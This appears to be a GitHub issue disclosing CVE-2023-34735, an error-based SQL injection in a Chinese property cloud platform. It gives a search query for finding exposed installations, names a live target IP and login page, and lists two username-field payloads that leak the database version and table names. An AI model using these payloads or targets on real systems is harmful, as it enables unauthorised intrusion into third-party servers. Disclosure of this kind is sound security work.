CVE-2023-34735: Error based SQL injection in 物业云平台管理中心 Property Cloud Platform Management Center version 1.0 · Issue #4 · prismbreak/vulnerabilities

1. Search vulnerable products on internet

Go to https://hunter.qianxin.com/, and use this syntax to search potential vulnerable products existing on internet: web.body="深圳市道尔智控科技股份有限公司"&&web.title="物业云平台登录页面"

This product is on the products list: https://www.drzk.cn/chanpinzhongxin/tccxt/
Source: https://aiqicha.baidu.com/copyright?pid=32990111708718&softId=copyright_79728905b610e9cd9e9c3dd154a77dd8

The target we are going to test is: http://121.15.128.203:8081/Login/Login.aspx

2. Exploitation

Because of the backend code concatenates SQL statements and lack of validation, we can trigger errors to exploit this.
Insert the payload below in Username box and login:
admin’ and 1=(@@version)–+
admin’ and 1=(select top 1 table_name from information_schema.tables)–+

The application errors and output the version of SQL component and tables